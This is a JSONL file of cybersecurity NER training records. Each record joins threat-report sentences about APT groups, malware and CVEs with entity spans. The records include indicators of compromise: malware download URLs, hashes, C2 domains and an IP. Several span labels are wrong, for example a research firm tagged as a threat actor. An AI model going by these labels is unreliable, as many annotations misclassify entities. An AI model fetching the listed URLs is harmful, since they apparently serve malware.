In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": {"MALWARE: Microsoft Word attachment": [[80, 105]], "VULNERABILITY: CVE-2017-0199": [[138, 151]], "TOOL: ZeroT Trojan": [[166, 178]], "TOOL: PlugX Remote Access Trojan": [[210, 236]], "TOOL: RAT": [[239, 242]], "THREAT_ACTOR: APT34": [[266, 271]], "TOOL: Microsoft Office": [[286, 302]], "VULNERABILITY: CVE-2017-11882": [[317, 331]], "MALWARE: POWRUNER": [[342, 350]], "MALWARE: BONDUPDATER": [[355, 366]], "ORGANIZATION: Microsoft": [[390, 399]]}, "info": {"id": "cyberner_stix_train_003604", "source": "cyberner_stix_train"}} {"text": "http://ditetec.com S-DOM/ts.exe http://ditetec.com S-DOM/u2.exe http://domass.com.ua S-DOM/index.gif http://firop.com S-DOM/ego.exe http://unoset.com S-DOM/jpx.exe http://unoset.com S-DOM/sxr.exe https://doci.download S-DOM/inc.exe https://farhenzel.co S-DOM/gls.exe https://farsonka.co S-DOM/trb.exe https://formsonat.co S-DOM/mrb.exe https://fortuma.co S-DOM/scu.exe https://iilliiill.bid S-DOM/6ven.exe https://iilliiill.bid S-DOM/ven.exe https://iilliiill.bid S-DOM/ven.tvv https://lom.party S-DOM/mov.exe https://naiillad.date S-DOM/ex3.exe https://naiillad.date S-DOM/u3.exe https://naiillad.date S-DOM/vmer.exe https://naiillad.date S-DOM/vsync.exe https://notepad-plus-plus.org/repository S-DOM/7.x/7.4.2/npp.7.4.2.Installer.exe https://prof.cricket S-DOM/wp.exe https://tvavi.win S-DOM/pago.exe .", "spans": {"FILEPATH: http://ditetec.com S-DOM/ts.exe": [[0, 31]], "FILEPATH: http://ditetec.com S-DOM/u2.exe": [[32, 63]], "FILEPATH: http://domass.com.ua S-DOM/index.gif": [[64, 100]], "FILEPATH: http://firop.com S-DOM/ego.exe": [[101, 131]], "FILEPATH: http://unoset.com S-DOM/jpx.exe": [[132, 163]], "FILEPATH: http://unoset.com S-DOM/sxr.exe": [[164, 195]], "FILEPATH: https://doci.download S-DOM/inc.exe": [[196, 231]], "FILEPATH: https://farhenzel.co 
S-DOM/gls.exe": [[232, 266]], "FILEPATH: https://farsonka.co S-DOM/trb.exe": [[267, 300]], "FILEPATH: https://formsonat.co S-DOM/mrb.exe": [[301, 335]], "FILEPATH: https://fortuma.co S-DOM/scu.exe": [[336, 368]], "FILEPATH: https://iilliiill.bid S-DOM/6ven.exe": [[369, 405]], "FILEPATH: https://iilliiill.bid S-DOM/ven.exe": [[406, 441]], "FILEPATH: https://iilliiill.bid S-DOM/ven.tvv": [[442, 477]], "FILEPATH: https://lom.party S-DOM/mov.exe": [[478, 509]], "FILEPATH: https://naiillad.date S-DOM/ex3.exe": [[510, 545]], "FILEPATH: https://naiillad.date S-DOM/u3.exe": [[546, 580]], "FILEPATH: https://naiillad.date S-DOM/vmer.exe": [[581, 617]], "FILEPATH: https://naiillad.date S-DOM/vsync.exe": [[618, 655]], "FILEPATH: https://notepad-plus-plus.org/repository S-DOM/7.x/7.4.2/npp.7.4.2.Installer.exe": [[656, 736]], "FILEPATH: https://prof.cricket S-DOM/wp.exe": [[737, 770]], "FILEPATH: https://tvavi.win S-DOM/pago.exe": [[771, 803]]}, "info": {"id": "cyberner_stix_train_003605", "source": "cyberner_stix_train"}} {"text": ") You should also avoid the temptation to play games from sources other than legitimate app stores ; such games are not safe and may bring harm to your reputation and your bank account . The Hong Kong government was spied on by the Winnti hackers . Back in 2013 , CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news , an Israeli newspaper .", "spans": {"THREAT_ACTOR: Winnti": [[232, 238]], "THREAT_ACTOR: CopyKittens": [[264, 275]], "ORGANIZATION: Facebook": [[289, 297]]}, "info": {"id": "cyberner_stix_train_003606", "source": "cyberner_stix_train"}} {"text": "The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet . 
Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns .", "spans": {"ORGANIZATION: Novetta": [[26, 33]], "ORGANIZATION: International Civil Aviation Organization": [[165, 206]], "ORGANIZATION: Unit 42": [[293, 300]], "MALWARE: Trojan": [[349, 355]], "MALWARE: Bookworm": [[363, 371]]}, "info": {"id": "cyberner_stix_train_003607", "source": "cyberner_stix_train"}} {"text": "In most so-called Western versions of the Trojan , the package names in the default configuration file are erased . In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel . This is of course simple but often it can be enough for a user to miss something malicious by name .", "spans": {"ORGANIZATION: TALOS": [[131, 136]], "THREAT_ACTOR: DarkHotel": [[217, 226]]}, "info": {"id": "cyberner_stix_train_003608", "source": "cyberner_stix_train"}} {"text": "The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": {"VULNERABILITY: EternalBlue": [[20, 31]], "TOOL: Metasploit": [[43, 53]], "THREAT_ACTOR: actors": [[82, 88], [217, 223]], "ORGANIZATION: Users": [[124, 129]]}, "info": {"id": "cyberner_stix_train_003609", "source": "cyberner_stix_train"}} {"text": "Filename : ntslwin.exe MD5 : 7e67122d3a052e4755b02965e2e56a2e Filename : ~de03fc12a.docm MD5 : 9d703d31795bac83c4dd90527d149796 . 
templates.dotm dropped the following :", "spans": {"FILEPATH: ntslwin.exe": [[11, 22]], "FILEPATH: 7e67122d3a052e4755b02965e2e56a2e": [[29, 61]], "FILEPATH: ~de03fc12a.docm": [[73, 88]], "FILEPATH: 9d703d31795bac83c4dd90527d149796": [[95, 127]], "FILEPATH: templates.dotm": [[130, 144]]}, "info": {"id": "cyberner_stix_train_003610", "source": "cyberner_stix_train"}} {"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials . INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll .", "spans": {"THREAT_ACTOR: Insikt Group": [[0, 12]], "MALWARE: Citrix-hosted": [[111, 124]], "MALWARE: INF files": [[302, 310]], "THREAT_ACTOR: MuddyWater": [[341, 351]], "MALWARE: Advpack.dll": [[388, 399]], "MALWARE: IEAdvpack.dll": [[408, 421]]}, "info": {"id": "cyberner_stix_train_003611", "source": "cyberner_stix_train"}} {"text": "SpyNote RAT builder The SpyNote Remote Access Trojan ( RAT ) builder is gaining popularity in the hacking community , so we decided to study its pervasiveness . In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk . 
The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": {"MALWARE: SpyNote RAT": [[0, 11]], "MALWARE: SpyNote": [[24, 31]], "THREAT_ACTOR: Cobalt group": [[258, 270]], "MALWARE: Cobalt Strike": [[279, 292]], "THREAT_ACTOR: cyber heists": [[328, 340]], "ORGANIZATION: financial institutions": [[352, 374]]}, "info": {"id": "cyberner_stix_train_003612", "source": "cyberner_stix_train"}} {"text": "We did not apply this to any live C2 servers – we only tested this with our own servers in our lab .", "spans": {"TOOL: C2": [[34, 36]]}, "info": {"id": "cyberner_stix_train_003613", "source": "cyberner_stix_train"}} {"text": "Android Trojan Found in Targeted Attack 26 MAR 2013 In the past , we ’ ve seen targeted attacks against Tibetan and Uyghur activists on Windows and Mac OS X platforms . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did .", "spans": {"SYSTEM: Android": [[0, 7]], "SYSTEM: Windows": [[136, 143]], "SYSTEM: Mac OS X": [[148, 156]], "THREAT_ACTOR: Lotus Blossom": [[169, 182]], "VULNERABILITY: CVE-2014-6332": [[209, 222]], "TOOL: Emissary Trojan": [[255, 270]]}, "info": {"id": "cyberner_stix_train_003614", "source": "cyberner_stix_train"}} {"text": "Over the years Kaspersky is tracked multiple campaigns by the Animal Farm group . 
Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": {"ORGANIZATION: Kaspersky": [[15, 24]], "THREAT_ACTOR: Animal Farm group": [[62, 79]], "MALWARE: Carbanak": [[120, 128]], "THREAT_ACTOR: attackers": [[129, 138]]}, "info": {"id": "cyberner_stix_train_003615", "source": "cyberner_stix_train"}} {"text": "APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others .", "spans": {"THREAT_ACTOR: APT10's": [[0, 7]], "ORGANIZATION: MSPs": [[39, 43]], "FILEPATH: sample": [[327, 333]]}, "info": {"id": "cyberner_stix_train_003616", "source": "cyberner_stix_train"}} {"text": "XLoader abuses the MessagePack ( a data interchange format ) to package the stolen data and exfiltrate it via the WebSocket protocol for faster and more efficient transmission . The operation , known as FASTCash” has enabled Lazarus to fraudulently empty ATMs of cash . 
The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the “ Stealthy Email Stealer ” part of their arsenal .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: Lazarus": [[225, 232]], "THREAT_ACTOR: TA505": [[274, 279]]}, "info": {"id": "cyberner_stix_train_003617", "source": "cyberner_stix_train"}} {"text": "This post discusses an earlier variant of the backdoor attributed to the MoleRATs group .", "spans": {"THREAT_ACTOR: MoleRATs": [[73, 81]]}, "info": {"id": "cyberner_stix_train_003618", "source": "cyberner_stix_train"}} {"text": "2013 in figures A total of 143,211 new modifications of malicious programs targeting mobile devices were detected in all of 2013 ( as of January 1 , 2014 ) . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed . Since Winnti is also a malware family , we always write “ Winnti Group ” when we refer to the malefactors behind the attacks . TIEDYE has similarities to RABBITHUNT , which is a backdoor written in C++ that communicates via a custom binary protocol over TCP .", "spans": {"ORGANIZATION: Wikileaks": [[174, 183]], "TOOL: Mikrotik": [[229, 237]], "TOOL: ChimayRed": [[245, 254]], "MALWARE: Winnti": [[263, 269]], "THREAT_ACTOR: Winnti Group": [[315, 327]], "MALWARE: TIEDYE": [[384, 390]], "MALWARE: RABBITHUNT": [[411, 421]]}, "info": {"id": "cyberner_stix_train_003619", "source": "cyberner_stix_train"}} {"text": "In a 5-month timespan , actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging , back-connect proxy or RAT capabilities . They also identified broadly similar TTPs being used in the attack against a U.S law firm specializing in intellectual property law . 
We also identified www.gokickes.com was the C2 of another Invader variant ( 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb ) .", "spans": {"ORGANIZATION: They": [[194, 198]], "DOMAIN: www.gokickes.com": [[347, 363]], "TOOL: C2": [[372, 374]], "MALWARE: Invader variant": [[386, 401]], "FILEPATH: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[404, 468]]}, "info": {"id": "cyberner_stix_train_003620", "source": "cyberner_stix_train"}} {"text": "Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ? this SWC was used to specifically target Turkish banking . Outlaw : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": {"SYSTEM: Android": [[47, 54]], "TOOL: SWC": [[69, 72]], "ORGANIZATION: banking": [[113, 120]], "THREAT_ACTOR: Outlaw": [[123, 129]], "FILEPATH: b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d": [[132, 196]], "MALWARE: Shellbot": [[197, 205]], "MALWARE: Backdoor.SH.SHELLBOT.AA": [[206, 229]], "VULNERABILITY: ProxyNotShell": [[243, 256]], "SYSTEM: Microsoft Exchange servers": [[279, 305]], "ORGANIZATION: Microsoft": [[308, 317]]}, "info": {"id": "cyberner_stix_train_003621", "source": "cyberner_stix_train"}} {"text": "We observed the following customizations :", "spans": {}, "info": {"id": "cyberner_stix_train_003622", "source": "cyberner_stix_train"}} {"text": "HummingBad does this by silently installing promoted apps on infected phones , defrauding legitimate mobile advertisers , and creating fraudulent statistics inside the official Google Play Store . We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America . 
APT33 : 37.48.105.178 servhost.hopto.org . Others include Excel spreadsheets that contain socially engineered instructions on how to enable macros in Excel so that the malicious VBA code can be executed .", "spans": {"MALWARE: HummingBad": [[0, 10]], "SYSTEM: Google Play Store": [[177, 194]], "THREAT_ACTOR: Lazarus": [[230, 237]], "ORGANIZATION: Trend Micro": [[288, 299]], "TOOL: BKDR_BINLODR.ZNFJ-A": [[303, 322]], "ORGANIZATION: financial institutions": [[350, 372]], "THREAT_ACTOR: APT33": [[396, 401]], "IP_ADDRESS: 37.48.105.178": [[404, 417]], "DOMAIN: servhost.hopto.org": [[418, 436]], "THREAT_ACTOR: Excel spreadsheets that contain socially engineered instructions": [[454, 518]], "THREAT_ACTOR: enable macros in Excel so that the malicious VBA code can be executed": [[529, 598]]}, "info": {"id": "cyberner_stix_train_003623", "source": "cyberner_stix_train"}} {"text": "Like multiple other Chinese cyber espionage actors , TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit . Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak Trojan .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[53, 67]], "FILEPATH: Pony malware": [[263, 275]], "FILEPATH: pm.dll”": [[278, 285]], "MALWARE: Trojan": [[316, 322]]}, "info": {"id": "cyberner_stix_train_003624", "source": "cyberner_stix_train"}} {"text": "We also found several apps containing the malware , which were developed by other developers on Google Play . The Winnti umbrella and closely associated entities has been active since at least 2009 . Finally the main network communication function GetIpListAndConnect is called . 
The strings are obfuscated using the stack and simple Bitwise operation .", "spans": {"SYSTEM: Google Play": [[96, 107]], "TOOL: The strings": [[280, 291]]}, "info": {"id": "cyberner_stix_train_003625", "source": "cyberner_stix_train"}} {"text": "Then the application downloads java archive from the URL specified in json , dynamically loads it with class loader API . The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket (psexec.exe) . In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net .", "spans": {"MALWARE: etool.exe": [[221, 230]], "VULNERABILITY: CVE-2017-0144": [[272, 285]], "MALWARE: MS07-010": [[311, 319]], "MALWARE: checker1.exe": [[320, 332]], "MALWARE: PsExec": [[417, 423]], "MALWARE: DustySky": [[474, 482]], "THREAT_ACTOR: attackers": [[489, 498]], "MALWARE: publicly available tools": [[503, 527]], "MALWARE: Remote Administration Tools": [[550, 577]], "MALWARE: RAT": [[580, 583]], "MALWARE: Poison Ivy": [[588, 598]], "MALWARE: Nano Core": [[601, 610]], "MALWARE: XtremeRAT": [[613, 622]], "MALWARE: DarkComet": [[625, 634]], "MALWARE: Spy-Net": [[639, 646]]}, "info": {"id": "cyberner_stix_train_003626", "source": "cyberner_stix_train"}} {"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . 
In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware .", "spans": {"THREAT_ACTOR: group": [[23, 28]], "TOOL: powershell-based malware": [[57, 81]], "ORGANIZATION: social engineering": [[93, 111]], "MALWARE: KeyBoy": [[352, 358]], "MALWARE: string obfuscation routine": [[373, 399]]}, "info": {"id": "cyberner_stix_train_003627", "source": "cyberner_stix_train"}} {"text": "SPLM / CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting http over fully encrypted TLSv1 and TLSv1.2 communications , mostly deployed in the second half of 2017 by Sofacy .", "spans": {"MALWARE: SPLM": [[0, 4]], "MALWARE: CHOPSTICK": [[7, 16]], "TOOL: C++": [[80, 83]], "SYSTEM: Windows": [[84, 91]], "TOOL: COM": [[92, 95]], "THREAT_ACTOR: Sofacy": [[224, 230]]}, "info": {"id": "cyberner_stix_train_003628", "source": "cyberner_stix_train"}} {"text": "The same happens with the package squareup.otto , which is an open-source bus implementation focused on Android implementation . The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week . Similar to the newly discovered HIGHTIDE samples documented above , this malicious document dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe . 
Enterprise T1482 Domain Trust Discovery During the SolarWinds Compromise , APT29 used the Get - AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell .", "spans": {"SYSTEM: Android": [[104, 111]], "MALWARE: HIGHTIDE": [[318, 326]], "FILEPATH: SETTINGS\\Temp\\word.exe": [[439, 461]], "THREAT_ACTOR: the SolarWinds Compromise": [[511, 536]], "THREAT_ACTOR: APT29": [[539, 544]]}, "info": {"id": "cyberner_stix_train_003629", "source": "cyberner_stix_train"}} {"text": "This document 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 appears to have been targeting a North American government organization dealing with foreign affairs .", "spans": {"FILEPATH: 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5": [[14, 78]]}, "info": {"id": "cyberner_stix_train_003630", "source": "cyberner_stix_train"}} {"text": "Since the size is controlled by the attacker , it ’s possible to overflow the fixed size buffer with certain data .", "spans": {}, "info": {"id": "cyberner_stix_train_003631", "source": "cyberner_stix_train"}} {"text": "Until 2013 however , earlier Duke toolsets had not been put in a proper context .", "spans": {"THREAT_ACTOR: Duke": [[29, 33]]}, "info": {"id": "cyberner_stix_train_003632", "source": "cyberner_stix_train"}} {"text": "The case where we observed this involved WhatsApp . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . 
Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists , activists , and dissidents since at least 2012 .", "spans": {"SYSTEM: WhatsApp": [[41, 49]], "MALWARE: malware": [[56, 63]], "THREAT_ACTOR: Stealth Falcon": [[188, 202]]}, "info": {"id": "cyberner_stix_train_003633", "source": "cyberner_stix_train"}} {"text": "Throughout 2017 , we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": {"TOOL: BACKSWING": [[46, 55]], "FILEPATH: c:\\temp\\rr.exe": [[208, 222]]}, "info": {"id": "cyberner_stix_train_003634", "source": "cyberner_stix_train"}} {"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . The malware will then install fake certificates in the system to perform a MitM attack without notifying the user .", "spans": {"MALWARE: RIPPER": [[58, 64]]}, "info": {"id": "cyberner_stix_train_003635", "source": "cyberner_stix_train"}} {"text": "While the number of Sogu targets is currently small relative to the Poison Ivy attacks , we continue to monitor their activities .", "spans": {"ORGANIZATION: Sogu": [[20, 24]], "MALWARE: Poison Ivy": [[68, 78]]}, "info": {"id": "cyberner_stix_train_003636", "source": "cyberner_stix_train"}} {"text": "The fake bitmap image embedded as resource The 32-bit stage 2 malware uses a customized loading mechanism ( i.e. , the PE file has a scrambled IAT and relocation table ) and exports only one function . Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT . 
All exports contain the exact same code which will decrypt the payload , inject it into memory , and execute it . STRATOFEAR ’s code references five predefined module types that have an ID value and an internal name :", "spans": {"THREAT_ACTOR: APT33": [[233, 238]], "TOOL: DROPSHOT": [[243, 251]], "TOOL: DROPSHOT samples": [[302, 318]], "TOOL: SHAPESHIFT": [[368, 378]], "MALWARE: STRATOFEAR ’s code": [[495, 513]]}, "info": {"id": "cyberner_stix_train_003637", "source": "cyberner_stix_train"}} {"text": "Of course , it 's also possible that whatever group The Shadow Brokers have exposed simply gained access to the Stuxnet tools secondhand , and reused them . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": {"TOOL: Stuxnet tools": [[112, 125]], "ORGANIZATION: activists": [[317, 326]]}, "info": {"id": "cyberner_stix_train_003638", "source": "cyberner_stix_train"}} {"text": "These actors have also used Adobe Flash player vulnerabilities to gain initial entry into users' environments .", "spans": {"ORGANIZATION: Adobe": [[28, 33]], "TOOL: Flash player": [[34, 46]]}, "info": {"id": "cyberner_stix_train_003639", "source": "cyberner_stix_train"}} {"text": "Patchwork is known for rehashing off-therack tools and malware for its own campaigns . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "TOOL: rehashing off-therack tools": [[23, 50]], "TOOL: malware": [[55, 62]]}, "info": {"id": "cyberner_stix_train_003640", "source": "cyberner_stix_train"}} {"text": "This confirms Tropic Trooper is using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . 
One government official puts it very matter-of-factly: Winnti is very specific to Germany .", "spans": {"THREAT_ACTOR: Tropic Trooper": [[14, 28]], "TOOL: Poison Ivy": [[38, 48]], "ORGANIZATION: Trend Micro": [[113, 124]], "THREAT_ACTOR: Winnti": [[215, 221]]}, "info": {"id": "cyberner_stix_train_003641", "source": "cyberner_stix_train"}} {"text": "The software generated 2FA code as it appeared on the device ’ s display ( left ) and as available in the database ( right ) Along with the malicious DEFENSOR ID app , another malicious app named Defensor Digital was discovered . In all likelihood , Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover . The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack .", "spans": {"MALWARE: Defensor Digital": [[196, 212]], "THREAT_ACTOR: Waterbug’s": [[250, 260]], "TOOL: Crambus infrastructure": [[268, 290]], "THREAT_ACTOR: attackers": [[337, 346]], "MALWARE: SSL certificates": [[437, 453]], "MALWARE: FakeTLS": [[462, 469]], "MALWARE: Destover backdoor": [[495, 512]], "MALWARE: Escad": [[530, 535]]}, "info": {"id": "cyberner_stix_train_003642", "source": "cyberner_stix_train"}} {"text": "Passive DNS results on a communications domain associated with the Shamoon attack revealed related network infrastructure , identifying additional domains used by the threat actors .", "spans": {"MALWARE: Shamoon": [[67, 74]]}, "info": {"id": "cyberner_stix_train_003643", "source": "cyberner_stix_train"}} {"text": "This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": {}, "info": {"id": "cyberner_stix_train_003644", "source": "cyberner_stix_train"}} {"text": "This version appeared as Wabi Music , and 
copied a popular video-sharing social networking service as its backend login page . Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights . And , While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": {"ORGANIZATION: Kaspersky Lab": [[179, 192]], "ORGANIZATION: bank": [[259, 263]], "THREAT_ACTOR: Metel": [[276, 281]], "THREAT_ACTOR: GCMAN": [[286, 291]], "THREAT_ACTOR: Carbanak group": [[321, 335]]}, "info": {"id": "cyberner_stix_train_003645", "source": "cyberner_stix_train"}} {"text": "The additional samples targeted the same large Central Asian nation state as previously mentioned but more interestingly , one of the samples was a weaponized document also leveraging DDE and containing a non-Zebrocy payload .", "spans": {}, "info": {"id": "cyberner_stix_train_003646", "source": "cyberner_stix_train"}} {"text": "Some of the C2 servers are located in Thailand . To show how this breach and similar breaches can be mitigated , we look at how Windows Defender ATP flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups . Using this approach , the attackers amassed at least 60 C&C servers over time . 
As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": {"ORGANIZATION: Windows Defender ATP": [[128, 148]], "TOOL: C&C": [[357, 360]], "MALWARE: SocGholish": [[414, 424]], "TOOL: Cobalt Strike": [[572, 585]], "TOOL: Mimikatz": [[589, 597]]}, "info": {"id": "cyberner_stix_train_003647", "source": "cyberner_stix_train"}} {"text": "However , they possess no banking functions , and merely steal the logins and passwords entered by users . At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign . Finally , the trojan Import Address Table ( IAT ) is resolved and the file path of the process that hosts the DLL is resolved and saved in a global variable . The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": {"THREAT_ACTOR: Turla": [[175, 180]], "MALWARE: trojan": [[263, 269]], "TOOL: Import Address Table": [[270, 290]], "TOOL: IAT": [[293, 296]], "TOOL: DLL": [[359, 362]], "MALWARE: INDUSTROYER": [[465, 476]], "MALWARE: INDUSTROYER.V2": [[481, 495]]}, "info": {"id": "cyberner_stix_train_003648", "source": "cyberner_stix_train"}} {"text": "Although the threat actor responsible for the development of EventBot is still unknown and the malware does not appear to be involved in major attacks , it is interesting to follow the early stages of mobile malware development . On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . 
Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis .", "spans": {"MALWARE: EventBot": [[61, 69]], "ORGANIZATION: NSA": [[363, 366]], "VULNERABILITY: ETERNALBLUE": [[391, 402]]}, "info": {"id": "cyberner_stix_train_003649", "source": "cyberner_stix_train"}} {"text": "If he doesn ’ t have Viber , the generically-named System Updates app gets downloaded and installed instead . Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers . It registers the service using the RegisterServiceCtrlHandler Windows API function . There is an apocryphal story about why he robbed banks .", "spans": {"SYSTEM: Windows": [[337, 344]]}, "info": {"id": "cyberner_stix_train_003650", "source": "cyberner_stix_train"}} {"text": "The precautions you take online have been covered extensively in almost all of our blogs ; even so , we believe this information bears repeating . Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang – a cyberespionage campaign directed at diplomatic organizations in Europe . 
Honeybee is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": {"ORGANIZATION: FireEye's": [[190, 199]], "THREAT_ACTOR: Ke3chang": [[225, 233]]}, "info": {"id": "cyberner_stix_train_003651", "source": "cyberner_stix_train"}} {"text": "The actor used a multi-stage infection like before , but the method was different .", "spans": {}, "info": {"id": "cyberner_stix_train_003652", "source": "cyberner_stix_train"}} {"text": "Because commands run from cmd.exe are acted on by csrss.exe , additional evidence of command history and responses sent to the cmd console window are often discoverable by analyzing the csrss.exe process 's memory .", "spans": {"FILEPATH: cmd.exe": [[26, 33]], "FILEPATH: csrss.exe": [[50, 59], [186, 195]]}, "info": {"id": "cyberner_stix_train_003653", "source": "cyberner_stix_train"}} {"text": "Analysts can easily extract detailed information from these trees , such as the implant DLL dropped by the installer , the command used to call rundll32.exe and load the DLL , and the registry modifications that set the DLL as a service .", "spans": {"TOOL: DLL": [[88, 91], [170, 173], [220, 223]], "FILEPATH: rundll32.exe": [[144, 156]]}, "info": {"id": "cyberner_stix_train_003654", "source": "cyberner_stix_train"}} {"text": "The IP address is also used in the URL hardcoded into the first binary downloader .", "spans": {}, "info": {"id": "cyberner_stix_train_003655", "source": "cyberner_stix_train"}} {"text": "TG-3390 : binary.update-onlines.org .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: binary.update-onlines.org": [[10, 35]]}, "info": {"id": "cyberner_stix_train_003656", "source": "cyberner_stix_train"}} {"text": "Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources . 
